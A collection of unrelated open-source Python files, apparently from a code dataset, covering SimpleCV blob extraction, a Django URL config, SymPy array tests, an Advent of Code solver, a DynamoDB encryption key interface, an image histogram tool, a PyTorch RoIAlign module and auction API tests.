if( not isaHole ): #if we aren't a hole then we are an object, so get and return our featuress
temp = self._extractData(seq,colorImg,minsize,maxsize,appx_level)
if( temp is not None ):
retVal.append(temp)
nextLayer = seq.v_next()
if nextLayer is not None:
nextLayerDown.append(nextLayer)
seq = seq.h_next()
if seq is None:
break
for nextLayer in nextLayerDown:
retVal += self._extractFromBinary(nextLayer, not isaHole, colorImg, minsize,maxsize,appx_level)
return retVal
def _extractData(self,seq,color,minsize,maxsize,appx_level):
"""
Extract the bulk of the data from a give blob. If the blob's are is too large
or too small the method returns none.
"""
if( seq is None or not len(seq)):
return None
area = cv.ContourArea(seq)
if( area < minsize or area > maxsize):
return None
retVal = Blob()
retVal.image = color
retVal.mArea = area
retVal.mMinRectangle = cv.MinAreaRect2(seq)
bb = cv.BoundingRect(seq)
retVal.x = bb[0]+(bb[2]/2)
retVal.y = bb[1]+(bb[3]/2)
retVal.mPerimeter = cv.ArcLength(seq)
if( seq is not None): #KAS
retVal.mContour = list(seq)
try:
import cv2
if( retVal.mContour is not None):
retVal.mContourAppx = []
appx = cv2.approxPolyDP(np.array([retVal.mContour],'float32'),appx_level,True)
for p in appx:
retVal.mContourAppx.append((int(p[0][0]),int(p[0][1])))
except:
pass
# so this is a bit hacky....
# For blobs that live right on the edge of the image OpenCV reports the position and width
# height as being one over for the true position. E.g. if a blob is at (0,0) OpenCV reports
# its position as (1,1). Likewise the width and height for the other corners is reported as
# being one less than the width and height. This is a known bug.
xx = bb[0]
yy = bb[1]
ww = bb[2]
hh = bb[3]
retVal.points = [(xx,yy),(xx+ww,yy),(xx+ww,yy+hh),(xx,yy+hh)]
retVal._updateExtents()
chull = cv.ConvexHull2(seq,cv.CreateMemStorage(),return_points=1)
retVal.mConvexHull = list(chull)
# KAS -- FLAG FOR REPLACE 6/6/2012
#hullMask = self._getHullMask(chull,bb)
# KAS -- FLAG FOR REPLACE 6/6/2012
#retVal.mHullImg = self._getBlobAsImage(chull,bb,color.getBitmap(),hullMask)
# KAS -- FLAG FOR REPLACE 6/6/2012
#retVal.mHullMask = Image(hullMask)
del chull
moments = cv.Moments(seq)
#This is a hack for a python wrapper bug that was missing
#the constants required from the ctype
retVal.m00 = area
try:
retVal.m10 = moments.m10
retVal.m01 = moments.m01
retVal.m11 = moments.m11
retVal.m20 = moments.m20
retVal.m02 = moments.m02
retVal.m21 = moments.m21
retVal.m12 = moments.m12
except:
retVal.m10 = cv.GetSpatialMoment(moments,1,0)
retVal.m01 = cv.GetSpatialMoment(moments,0,1)
retVal.m11 = cv.GetSpatialMoment(moments,1,1)
retVal.m20 = cv.GetSpatialMoment(moments,2,0)
retVal.m02 = cv.GetSpatialMoment(moments,0,2)
retVal.m21 = cv.GetSpatialMoment(moments,2,1)
retVal.m12 = cv.GetSpatialMoment(moments,1,2)
retVal.mHu = cv.GetHuMoments(moments)
# KAS -- FLAG FOR REPLACE 6/6/2012
mask = self._getMask(seq,bb)
#retVal.mMask = Image(mask)
retVal.mAvgColor = self._getAvg(color.getBitmap(),bb,mask)
retVal.mAvgColor = retVal.mAvgColor[0:3]
#retVal.mAvgColor = self._getAvg(color.getBitmap(),retVal.mBoundingBox,mask)
#retVal.mAvgColor = retVal.mAvgColor[0:3]
# KAS -- FLAG FOR REPLACE 6/6/2012
#retVal.mImg = self._getBlobAsImage(seq,bb,color.getBitmap(),mask)
retVal.mHoleContour = self._getHoles(seq)
retVal.mAspectRatio = retVal.mMinRectangle[1][0]/retVal.mMinRectangle[1][1]
return retVal
def _getHoles(self,seq):
"""
This method returns the holes associated with a blob as a list of tuples.
"""
retVal = None
holes = seq.v_next()
if( holes is not None ):
retVal = [list(holes)]
while( holes.h_next() is not None ):
holes = holes.h_next();
temp = list(holes)
if( len(temp) >= 3 ): #exclude single pixel holes
retVal.append(temp)
return retVal
def _getMask(self,seq,bb):
"""
Return a binary image of a particular contour sequence.
"""
#bb = cv.BoundingRect(seq)
mask = cv.CreateImage((bb[2],bb[3]),cv.IPL_DEPTH_8U,1)
cv.Zero(mask)
cv.DrawContours(mask,seq,(255),(0),0,thickness=-1, offset=(-1*bb[0],-1*bb[1]))
holes = seq.v_next()
if( holes is not None ):
cv.DrawContours(mask,holes,(0),(255),0,thickness=-1, offset=(-1*bb[0],-1*bb[1]))
while( holes.h_next() is not None ):
holes = holes.h_next();
if(holes is not None):
cv.DrawContours(mask,holes,(0),(255),0,thickness=-1, offset=(-1*bb[0],-1*bb[1]))
return mask
def _getHullMask(self,hull,bb):
"""
Return a mask of the convex hull of a blob.
"""
bb = cv.BoundingRect(hull)
mask = cv.CreateImage((bb[2],bb[3]),cv.IPL_DEPTH_8U,1)
cv.Zero(mask)
cv.DrawContours(mask,hull,(255),(0),0,thickness=-1, offset=(-1*bb[0],-1*bb[1]))
return mask
def _getAvg(self,colorbitmap,bb,mask):
"""
Calculate the average color of a blob given the mask.
"""
cv.SetImageROI(colorbitmap,bb)
#may need the offset parameter
avg = cv.Avg(colorbitmap,mask)
cv.ResetImageROI(colorbitmap)
return avg
def _getBlobAsImage(self,seq,bb,colorbitmap,mask):
"""
Return an image that contains just pixels defined by the blob sequence.
"""
cv.SetImageROI(colorbitmap,bb)
outputImg = cv.CreateImage((bb[2],bb[3]),cv.IPL_DEPTH_8U,3)
cv.Zero(outputImg)
cv.Copy(colorbitmap,outputImg,mask)
cv.ResetImageROI(colorbitmap)
return(Image(outputImg))
from SimpleCV.ImageClass import Image
from SimpleCV.Features.Features import FeatureSet
from SimpleCV.Features.Blob import Blob
| 40.19281 | 299 | 0.61005 |
1b687a77cbb03c16d138693d050c1be02eb29de1 | 761 | py | Python | simplyscript_django/urls.py | kokhoor/SimplyScript_django | 6d7f12af400a14a2415893dabfed8746dda46a9f | [
"Apache-2.0"
] | null | null | null | simplyscript_django/urls.py | kokhoor/SimplyScript_django | 6d7f12af400a14a2415893dabfed8746dda46a9f | [
"Apache-2.0"
] | null | null | null | simplyscript_django/urls.py | kokhoor/SimplyScript_django | 6d7f12af400a14a2415893dabfed8746dda46a9f | [
"Apache-2.0"
] | null | null | null | """simplyscript_django URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
urlpatterns = [
path('admin/', admin.site.urls),
]
| 34.590909 | 77 | 0.713535 |
107a5e35b2847e17b36a7e72cc9765c9c287e8fa | 2,423 | py | Python | sympy/tensor/array/expressions/tests/test_as_explicit.py | shilpiprd/sympy | 556e9c61b31d0d5f101cd56b43e843fbf3bcf121 | [
"BSD-3-Clause"
] | 8,323 | 2015-01-02T15:51:43.000Z | 2022-03-31T13:13:19.000Z | sympy/tensor/array/expressions/tests/test_as_explicit.py | shilpiprd/sympy | 556e9c61b31d0d5f101cd56b43e843fbf3bcf121 | [
"BSD-3-Clause"
] | 15,102 | 2015-01-01T01:33:17.000Z | 2022-03-31T22:53:13.000Z | sympy/tensor/array/expressions/tests/test_as_explicit.py | shilpiprd/sympy | 556e9c61b31d0d5f101cd56b43e843fbf3bcf121 | [
"BSD-3-Clause"
] | 4,490 | 2015-01-01T17:48:07.000Z | 2022-03-31T17:24:05.000Z | from sympy import ImmutableDenseNDimArray, tensorproduct, MatrixSymbol, tensorcontraction, tensordiagonal, permutedims, \
Symbol
from sympy.tensor.array.expressions.array_expressions import ZeroArray, OneArray, ArraySymbol, \
ArrayTensorProduct, PermuteDims, ArrayDiagonal, ArrayContraction, ArrayAdd
from sympy.testing.pytest import raises
def test_array_as_explicit_call():
assert ZeroArray(3, 2, 4).as_explicit() == ImmutableDenseNDimArray.zeros(3, 2, 4)
assert OneArray(3, 2, 4).as_explicit() == ImmutableDenseNDimArray([1 for i in range(3*2*4)]).reshape(3, 2, 4)
k = Symbol("k")
X = ArraySymbol("X", k, 3, 2)
raises(ValueError, lambda: X.as_explicit())
raises(ValueError, lambda: ZeroArray(k, 2, 3).as_explicit())
raises(ValueError, lambda: OneArray(2, k, 2).as_explicit())
A = ArraySymbol("A", 3, 3)
B = ArraySymbol("B", 3, 3)
texpr = tensorproduct(A, B)
assert isinstance(texpr, ArrayTensorProduct)
assert texpr.as_explicit() == tensorproduct(A.as_explicit(), B.as_explicit())
texpr = tensorcontraction(A, (0, 1))
assert isinstance(texpr, ArrayContraction)
assert texpr.as_explicit() == A[0, 0] + A[1, 1] + A[2, 2]
texpr = tensordiagonal(A, (0, 1))
assert isinstance(texpr, ArrayDiagonal)
assert texpr.as_explicit() == ImmutableDenseNDimArray([A[0, 0], A[1, 1], A[2, 2]])
texpr = permutedims(A, [1, 0])
assert isinstance(texpr, PermuteDims)
assert texpr.as_explicit() == permutedims(A.as_explicit(), [1, 0])
def test_array_as_explicit_matrix_symbol():
A = MatrixSymbol("A", 3, 3)
B = MatrixSymbol("B", 3, 3)
texpr = tensorproduct(A, B)
assert isinstance(texpr, ArrayTensorProduct)
assert texpr.as_explicit() == tensorproduct(A.as_explicit(), B.as_explicit())
texpr = tensorcontraction(A, (0, 1))
assert isinstance(texpr, ArrayContraction)
assert texpr.as_explicit() == A[0, 0] + A[1, 1] + A[2, 2]
texpr = tensordiagonal(A, (0, 1))
assert isinstance(texpr, ArrayDiagonal)
assert texpr.as_explicit() == ImmutableDenseNDimArray([A[0, 0], A[1, 1], A[2, 2]])
texpr = permutedims(A, [1, 0])
assert isinstance(texpr, PermuteDims)
assert texpr.as_explicit() == permutedims(A.as_explicit(), [1, 0])
expr = ArrayAdd(ArrayTensorProduct(A, B), ArrayTensorProduct(B, A))
assert expr.as_explicit() == expr.args[0].as_explicit() + expr.args[1].as_explicit()
| 39.080645 | 121 | 0.684276 |
ca437d905b6c26a81af3fb014e39b7bd82767d8b | 3,304 | py | Python | 2015/23-opening_lock/solve.py | BrendanLeber/adventofcode | ea12330888b22609d4b7c849d388e42ed56291a8 | [
"MIT"
] | null | null | null | 2015/23-opening_lock/solve.py | BrendanLeber/adventofcode | ea12330888b22609d4b7c849d388e42ed56291a8 | [
"MIT"
] | null | null | null | 2015/23-opening_lock/solve.py | BrendanLeber/adventofcode | ea12330888b22609d4b7c849d388e42ed56291a8 | [
"MIT"
] | 1 | 2019-03-21T16:21:03.000Z | 2019-03-21T16:21:03.000Z | # -*- coding: utf-8 -*-
import argparse
import pdb
import traceback
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple
@dataclass
class Instruction:
name: str
reg: Optional[str]
offset: Optional[int]
def __str__(self) -> str:
if self.name in ["hlf", "tpl", "inc"]:
return f"{self.name} {self.reg}"
elif self.name in ["jie", "jio"]:
return f"{self.name} {self.reg}, {self.offset}"
elif self.name in ["jmp"]:
return f"{self.name} {self.offset}"
else:
raise ValueError(f"Unkown instruction: {self.name}")
def execute(program: List[Instruction], regs: Dict[str, int], verbose=False) -> Dict[str, int]:
ip: int = 0
while True:
if ip >= len(program):
break
inst = program[ip]
if verbose:
print(f"{ip:05d}: {inst!s} {regs}")
if inst.name == "hlf": # half r
regs[inst.reg] = regs[inst.reg] // 2
ip += 1
elif inst.name == "tpl": # triple r
regs[inst.reg] = regs[inst.reg] * 3
ip += 1
elif inst.name == "inc": # increment r
regs[inst.reg] = regs[inst.reg] + 1
ip += 1
elif inst.name == "jmp": # jump
ip += inst.offset
elif inst.name == "jie": # jump if r is even
if regs[inst.reg] % 2 == 0:
ip += inst.offset
else:
ip += 1
elif inst.name == "jio": # jump if r is one
if regs[inst.reg] == 1:
ip += inst.offset
else:
ip += 1
if verbose:
print(f"final state: ip:{ip} regs:{regs}")
return regs
def solve(program: List[Instruction], verbose=False) -> Tuple[int, int]:
regs: Dict[str, int] = {"a": 0, "b": 0}
regs = execute(program, regs, verbose)
one = regs["b"]
regs: Dict[str, int] = {"a": 1, "b": 0}
regs = execute(program, regs, verbose)
two = regs["b"]
return (one, two)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Advent of Code - 2015 - Day 23 - Opening the Turing Lock."
)
parser.add_argument(
"input",
type=str,
default="input.txt",
nargs="?",
help="The puzzle input. (Default %(default)s)",
)
parser.add_argument(
"--verbose",
action="store_true",
default=False,
help="Display extra info. (Default: %(default)s)",
)
args = parser.parse_args()
program: List[Instruction] = []
with open(args.input) as inf:
for line in inf:
parts = line.strip().split()
if parts[0] in ["inc", "tpl", "hlf"]:
inst = Instruction(parts[0], parts[1], None)
elif parts[0] in ["jie", "jio"]:
inst = Instruction(parts[0], parts[1][0], int(parts[2]))
elif parts[0] in ["jmp"]:
inst = Instruction(parts[0], None, int(parts[1]))
else:
raise ValueError("unknown instruction '{line.strip()}'")
program.append(inst)
try:
print(solve(program, verbose=args.verbose))
except Exception:
traceback.print_exc()
pdb.post_mortem()
| 28.730435 | 95 | 0.516041 |
b41caeee14a7463da250e2f2b4b3ed0ef3e584b6 | 7,183 | py | Python | src/dynamodb_encryption_sdk/delegated_keys/__init__.py | robin-aws/aws-dynamodb-encryption-python | 25c7c3d80bfbe0deb661b4beb86f61b8b2f8545e | [
"Apache-2.0"
] | null | null | null | src/dynamodb_encryption_sdk/delegated_keys/__init__.py | robin-aws/aws-dynamodb-encryption-python | 25c7c3d80bfbe0deb661b4beb86f61b8b2f8545e | [
"Apache-2.0"
] | 1 | 2021-03-20T05:42:35.000Z | 2021-03-20T05:42:35.000Z | src/dynamodb_encryption_sdk/delegated_keys/__init__.py | robin-aws/aws-dynamodb-encryption-python | 25c7c3d80bfbe0deb661b4beb86f61b8b2f8545e | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
"""Delegated keys."""
import abc
import six
from dynamodb_encryption_sdk.identifiers import EncryptionKeyType # noqa pylint: disable=unused-import
try: # Python 3.5.0 and 3.5.1 have incompatible typing modules
from typing import Dict, Optional, Text # noqa pylint: disable=unused-import
except ImportError: # pragma: no cover
# We only actually need these imports when running the mypy checks
pass
__all__ = ("DelegatedKey",)
def _raise_not_implemented(method_name):
"""Raises a standardized :class:`NotImplementedError` to report that the specified method
is not supported.
:raises NotImplementedError: when called
"""
raise NotImplementedError('"{}" is not supported by this DelegatedKey'.format(method_name))
@six.add_metaclass(abc.ABCMeta)
class DelegatedKey(object):
"""Delegated keys are black boxes that encrypt, decrypt, sign, and verify data and wrap
and unwrap keys. Not all delegated keys implement all methods.
Unless overridden by a subclass, any method that a delegated key does not implement raises
a :class:`NotImplementedError` detailing this.
"""
@abc.abstractproperty
def algorithm(self):
# type: () -> Text
"""Text description of algorithm used by this delegated key."""
@property
def allowed_for_raw_materials(self):
# type: () -> bool
"""Most delegated keys should not be used with :class:`RawDecryptionMaterials` or
:class:`RawEncryptionMaterials`.
:returns: False
:rtype: bool
"""
return False
@classmethod
def generate(cls, algorithm, key_length): # type: ignore
# type: (Text, int) -> DelegatedKey
# pylint: disable=unused-argument,no-self-use
"""Generate an instance of this :class:`DelegatedKey` using the specified algorithm and key length.
:param str algorithm: Text description of algorithm to be used
:param int key_length: Size of key to generate
:returns: Generated delegated key
:rtype: DelegatedKey
"""
_raise_not_implemented("generate")
def encrypt(self, algorithm, name, plaintext, additional_associated_data=None): # type: ignore
# type: (Text, Text, bytes, Optional[Dict[Text, Text]]) -> bytes
# pylint: disable=unused-argument,no-self-use
"""Encrypt data.
:param str algorithm: Text description of algorithm to use to encrypt data
:param str name: Name associated with plaintext data
:param bytes plaintext: Plaintext data to encrypt
:param dict additional_associated_data: Not used by all delegated keys, but if it
is, then if it is provided on encrypt it must be required on decrypt.
:returns: Encrypted ciphertext
:rtype: bytes
"""
_raise_not_implemented("encrypt")
def decrypt(self, algorithm, name, ciphertext, additional_associated_data=None): # type: ignore
# type: (Text, Text, bytes, Optional[Dict[Text, Text]]) -> bytes
# pylint: disable=unused-argument,no-self-use
"""Encrypt data.
:param str algorithm: Text description of algorithm to use to decrypt data
:param str name: Name associated with ciphertext data
:param bytes ciphertext: Ciphertext data to decrypt
:param dict additional_associated_data: Not used by all delegated keys, but if it
is, then if it is provided on encrypt it must be required on decrypt.
:returns: Decrypted plaintext
:rtype: bytes
"""
_raise_not_implemented("decrypt")
def wrap(self, algorithm, content_key, additional_associated_data=None): # type: ignore
# type: (Text, bytes, Optional[Dict[Text, Text]]) -> bytes
# pylint: disable=unused-argument,no-self-use
"""Wrap content key.
:param str algorithm: Text description of algorithm to use to wrap key
:param bytes content_key: Raw content key to wrap
:param dict additional_associated_data: Not used by all delegated keys, but if it
is, then if it is provided on wrap it must be required on unwrap.
:returns: Wrapped key
:rtype: bytes
"""
_raise_not_implemented("wrap")
def unwrap( # type: ignore
self, algorithm, wrapped_key, wrapped_key_algorithm, wrapped_key_type, additional_associated_data=None
):
# type: (Text, bytes, Text, EncryptionKeyType, Optional[Dict[Text, Text]]) -> DelegatedKey
# pylint: disable=unused-argument,no-self-use
"""Wrap content key.
:param str algorithm: Text description of algorithm to use to unwrap key
:param bytes content_key: Raw content key to wrap
:param str wrapped_key_algorithm: Text description of algorithm for unwrapped key to use
:param EncryptionKeyType wrapped_key_type: Type of key to treat key as once unwrapped
:param dict additional_associated_data: Not used by all delegated keys, but if it
is, then if it is provided on wrap it must be required on unwrap.
:returns: Delegated key using unwrapped key
:rtype: DelegatedKey
"""
_raise_not_implemented("unwrap")
def sign(self, algorithm, data): # type: ignore
# type: (Text, bytes) -> bytes
# pylint: disable=unused-argument,no-self-use
"""Sign data.
:param str algorithm: Text description of algorithm to use to sign data
:param bytes data: Data to sign
:returns: Signature value
:rtype: bytes
"""
_raise_not_implemented("sign")
def verify(self, algorithm, signature, data): # type: ignore
# type: (Text, bytes, bytes) -> None
# pylint: disable=unused-argument,no-self-use
"""Sign data.
:param str algorithm: Text description of algorithm to use to verify signature
:param bytes signature: Signature to verify
:param bytes data: Data over which to verify signature
"""
_raise_not_implemented("verify")
def signing_algorithm(self): # type: ignore
# type: () -> Text
# pylint: disable=no-self-use
"""Provide a description that can inform an appropriate cryptographic materials
provider about how to build a :class:`DelegatedKey` for signature verification.
If implemented, the return value of this method is included in the material description
written to the encrypted item.
:returns: Signing algorithm identifier
:rtype: str
"""
_raise_not_implemented("signing_algorithm")
| 41.281609 | 110 | 0.678686 |
03a56608307d0d70cb834db624a458069a8a7ffd | 1,775 | py | Python | src/tools/tile_hist.py | Vizzuality/DeforestationAnalysisTool | 30ce145404a333fecab05898053981f782a8e432 | [
"MIT",
"BSD-3-Clause"
] | 5 | 2018-05-28T08:02:11.000Z | 2022-01-22T11:34:08.000Z | src/tools/tile_hist.py | ImazonSadGoogle/DeforestationAnalysisTool | 1d2fd5f13b06265f8c043f44064c453f8d662086 | [
"MIT",
"BSD-3-Clause"
] | null | null | null | src/tools/tile_hist.py | ImazonSadGoogle/DeforestationAnalysisTool | 1d2fd5f13b06265f8c043f44064c453f8d662086 | [
"MIT",
"BSD-3-Clause"
] | 3 | 2016-01-18T09:37:14.000Z | 2020-07-10T10:57:56.000Z |
import sys
import Image
from os import walk
from os.path import join
from itertools import chain
from collections import defaultdict
from multiprocessing import Pool
from pipe import Pipe
def image_hist(image_path):
hist = defaultdict(float)
try:
i = Image.open(image_path)
except IOError:
print "failed to open %s" % image_path
return hist
pixels = list(i.getdata())
# optimize not repeating if inside
if len(i.getbands()) == 1:
for p in range(0, len(pixels)):
u = pixels[p]
hist[u] += 1.0
else:
for p in range(0, len(pixels)):
u = pixels[p][0]
hist[u] += 1.0
return hist
@Pipe
def accum_hist(image_hist):
curr = 0
hist = defaultdict(float)
for h in image_hist:
curr+=1
if curr%100 == 0:
print curr
for x in h:
hist[x] += h[x]
return hist
def files(folder):
for path, dirs, files in walk(folder):
for f in files:
yield join(path, f)
@Pipe
def filter_by_ext(iterable, ext):
for f in iterable:
if f.endswith(ext):
yield f
@Pipe
def parallel(iterable, fn, processes=2):
pool = Pool(processes=processes)
for x in pool.imap_unordered(fn, iterable, chunksize=10):
yield x
@Pipe
def print_hist(hist):
for x in hist:
print x, hist[x]
if __name__ == '__main__':
files(sys.argv[1]) | filter_by_ext('.png') | parallel(image_hist) | accum_hist | print_hist
"""
pool = Pool(processes=2)
# map
proccessed = pool.imap_unordered(image_hist, files(sys.argv[1]), chunksize=10)
# reduce
hist = accum_hist(proccessed)
for x in hist:
print x, hist[x]
"""
| 22.1875 | 95 | 0.588732 |
a6076cde61f1c09f0d21e196d1e2f3219bd1ac79 | 1,984 | py | Python | lib/models/roi_align/roi_align/roi_align.py | liuqk3/GSM | 188965b3a11f9cdbe166d79cac7cd2e9fb4c1785 | [
"MIT"
] | 3 | 2021-06-16T13:06:27.000Z | 2021-12-27T03:52:51.000Z | models/planercnn/roi_align/roi_align.py | namanshrimali/doepd.ai | fc57af2e131965d9d6c89e39a3eeab41c8dff40b | [
"MIT"
] | 5 | 2021-08-25T16:16:51.000Z | 2022-03-12T00:57:46.000Z | models/planercnn/roi_align/roi_align.py | namanshrimali/doepd.ai | fc57af2e131965d9d6c89e39a3eeab41c8dff40b | [
"MIT"
] | 1 | 2021-12-01T13:31:38.000Z | 2021-12-01T13:31:38.000Z | import torch
from torch import nn
from .crop_and_resize import CropAndResizeFunction, CropAndResize
class RoIAlign(nn.Module):
def __init__(self, crop_height, crop_width, extrapolation_value=0, transform_fpcoor=True):
super(RoIAlign, self).__init__()
self.crop_height = crop_height
self.crop_width = crop_width
self.extrapolation_value = extrapolation_value
self.transform_fpcoor = transform_fpcoor
def forward(self, featuremap, boxes, box_ind):
"""
RoIAlign based on crop_and_resize.
See more details on https://github.com/ppwwyyxx/tensorpack/blob/6d5ba6a970710eaaa14b89d24aace179eb8ee1af/examples/FasterRCNN/model.py#L301
:param featuremap: NxCxHxW
:param boxes: Mx4 float box with (x1, y1, x2, y2) **without normalization**
:param box_ind: M
:return: MxCxoHxoW
"""
x1, y1, x2, y2 = torch.split(boxes, 1, dim=1)
image_height, image_width = featuremap.size()[2:4]
if self.transform_fpcoor:
spacing_w = (x2 - x1) / float(self.crop_width)
spacing_h = (y2 - y1) / float(self.crop_height)
nx0 = (x1 + spacing_w / 2 - 0.5) / float(image_width - 1)
ny0 = (y1 + spacing_h / 2 - 0.5) / float(image_height - 1)
nw = spacing_w * float(self.crop_width - 1) / float(image_width - 1)
nh = spacing_h * float(self.crop_height - 1) / float(image_height - 1)
boxes = torch.cat((ny0, nx0, ny0 + nh, nx0 + nw), 1)
else:
x1 = x1 / float(image_width - 1)
x2 = x2 / float(image_width - 1)
y1 = y1 / float(image_height - 1)
y2 = y2 / float(image_height - 1)
boxes = torch.cat((y1, x1, y2, x2), 1)
boxes = boxes.detach().contiguous()
box_ind = box_ind.detach()
return CropAndResizeFunction.apply(featuremap, boxes, box_ind, self.crop_height, self.crop_width, self.extrapolation_value)
| 40.489796 | 146 | 0.626008 |
bf6fcc361f0c04fa007014f555fbdd35c528747f | 48,008 | py | Python | openprocurement/auctions/appraisal/tests/blanks/tender_blanks.py | oleksiyVeretiuk/openprocurement.auctions.appraisal | 710130ae54f4c46c17cb4fbc0cf485b81cd3624e | [
"Apache-2.0"
] | null | null | null | openprocurement/auctions/appraisal/tests/blanks/tender_blanks.py | oleksiyVeretiuk/openprocurement.auctions.appraisal | 710130ae54f4c46c17cb4fbc0cf485b81cd3624e | [
"Apache-2.0"
] | null | null | null | openprocurement/auctions/appraisal/tests/blanks/tender_blanks.py | oleksiyVeretiuk/openprocurement.auctions.appraisal | 710130ae54f4c46c17cb4fbc0cf485b81cd3624e | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from copy import deepcopy
from hashlib import sha512
from uuid import uuid4
from datetime import timedelta
from iso8601 import parse_date
import pytz
from openprocurement.auctions.core.tests.base import JSON_RENDERER_ERROR
from openprocurement.auctions.core.utils import (
SANDBOX_MODE, TZ, get_now
)
from openprocurement.auctions.appraisal.constants import (
CONTRACT_TYPES
)
# AppraisalAuctionTest
def create_role(self):
fields = set([
'awardCriteriaDetails', 'awardCriteriaDetails_en', 'awardCriteriaDetails_ru',
'description', 'description_en', 'description_ru', 'tenderAttempts',
'features', 'guarantee', 'hasEnquiries', 'items', 'lots', 'minimalStep', 'mode',
'procurementMethodRationale', 'procurementMethodRationale_en', 'procurementMethodRationale_ru',
'procurementMethodType', 'procuringEntity', 'status',
'submissionMethodDetails', 'submissionMethodDetails_en', 'submissionMethodDetails_ru',
'title', 'title_en', 'title_ru', 'value', 'auctionPeriod', 'lotIdentifier',
'auctionParameters', 'bankAccount', 'registrationFee',
])
if SANDBOX_MODE:
fields.add('procurementMethodDetails')
self.assertEqual(set(self.auction._fields) - self.auction._options.roles['create'].fields, fields)
def edit_role(self):
fields = set([
'bankAccount', 'description', 'title', 'title_en', 'title_ru',
'minimalStep', 'items', 'tenderAttempts', 'description', 'description_en',
'description_ru', 'registrationFee', 'guarantee', 'hasEnquiries', 'lotIdentifier',
'features', 'value'
])
role = self.auction._options.roles['edit_active.tendering']
if SANDBOX_MODE:
fields.add('procurementMethodDetails')
if role.function.__name__ == 'blacklist':
self.assertEqual(set(self.auction._fields) - role.fields, fields)
else:
self.assertEqual(set(self.auction._fields).intersection(role.fields), fields)
# AppraisalAuctionResourceTest
def create_auction_invalid(self):
request_path = '/auctions'
response = self.app.post(request_path, 'data', status=415)
self.assertEqual(response.status, '415 Unsupported Media Type')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description':
u"Content-Type header should be one of ['application/json']", u'location': u'header', u'name': u'Content-Type'}
])
response = self.app.post(
request_path, 'data', content_type='application/json', status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
JSON_RENDERER_ERROR
])
response = self.app.post_json(request_path, 'data', status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': u'Data not available',
u'location': u'body', u'name': u'data'}
])
response = self.app.post_json(request_path, {'not_data': {}}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': u'Data not available',
u'location': u'body', u'name': u'data'}
])
response = self.app.post_json(request_path, {'data': []}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': u'Data not available',
u'location': u'body', u'name': u'data'}
])
response = self.app.post_json(request_path, {'data': {'procurementMethodType': 'invalid_value'}}, status=415)
self.assertEqual(response.status, '415 Unsupported Media Type')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': u'procurementMethodType is not implemented', u'location': u'body', u'name': u'data'}
])
response = self.app.post_json(request_path, {'data': {'invalid_field': 'invalid_value', 'procurementMethodType': self.initial_data['procurementMethodType']}}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': u'Rogue field', u'location':
u'body', u'name': u'invalid_field'}
])
response = self.app.post_json(request_path, {'data': {'value': 'invalid_value', 'procurementMethodType': self.initial_data['procurementMethodType']}}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [
u'Please use a mapping for this field or Value instance instead of unicode.'], u'location': u'body', u'name': u'value'}
])
response = self.app.post_json(request_path, {'data': {'procurementMethod': 'invalid_value', 'procurementMethodType': self.initial_data['procurementMethodType']}}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertIn({u'description': [u"Value must be one of ['open', 'selective', 'limited']."], u'location': u'body', u'name': u'procurementMethod'}, response.json['errors'])
#self.assertIn({u'description': [u'This field is required.'], u'location': u'body', u'name': u'tenderPeriod'}, response.json['errors'])
# self.assertIn({u'description': [u'This field is required.'], u'location': u'body', u'name': u'minimalStep'}, response.json['errors'])
#self.assertIn({u'description': [u'This field is required.'], u'location': u'body', u'name': u'enquiryPeriod'}, response.json['errors'])
self.assertIn({u'description': [u'This field is required.'], u'location': u'body', u'name': u'value'}, response.json['errors'])
response = self.app.post_json(request_path, {'data': {'enquiryPeriod': {'endDate': 'invalid_value'}, 'procurementMethodType': self.initial_data['procurementMethodType']}}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': {u'endDate': [u"Could not parse invalid_value. Should be ISO8601."]}, u'location': u'body', u'name': u'enquiryPeriod'}
])
